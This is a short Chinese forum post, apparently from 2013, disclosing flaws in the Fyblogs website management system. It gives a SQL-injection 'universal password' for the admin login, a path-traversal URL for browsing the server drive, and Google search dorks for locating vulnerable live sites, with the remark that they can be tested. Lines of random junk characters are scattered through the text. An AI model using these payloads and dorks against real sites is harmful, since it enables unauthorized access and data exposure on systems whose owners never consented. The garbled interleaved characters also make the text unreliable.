漏洞类型: 未授权访问/权限绕过
! j! R. Z2 E( U# r, m3 ?: ^
F# u% f$ s* G) J& `简要描述:
- a( B3 E# F) w; k% k/ T0 ]+ X
: z+ m! G' }! t0 y3 R* IFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!2 {' O' ]- P0 {: y' D, N
@$ N, E7 `+ V! B4 ?! k7 w8 [详细说明:
& W3 U$ w5 {& E0 B/ {# y/ r* W6 [
; F9 `/ V3 z6 C: P3 w后台万能密码 'or'='or'
: ^, W* Z* L0 B. P后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
& B3 X/ X* `) N& Z$ a( s/ L9 V4 padmin/uploadfile.asp?currentFolder=/upfiles/../9 Q$ L1 |$ p+ r9 x: s0 C+ Y
; N3 H) o* _$ d/ j* K# Y
漏洞证明:7 V6 [7 j2 A- |" `- o2 f: n' Z
) E) }, I, o. p: S, A5 ~/ v谷歌:inurl:type.asp?id=1 新闻中心/ R Z; k; s. J! p1 `) `& C; l
或者 :inurl:download_ok.asp?
1 C( G# ^5 w! R1 ~2 P- g
. l: }6 }( `# }: S3 z6 K可以测试& ?1 N4 e& o' g v
/ V, @ A2 u( J0 k
1 U4 }( W+ A, \/ P
|
发表于 2013-3-7 13:07:46
收藏
支持
反对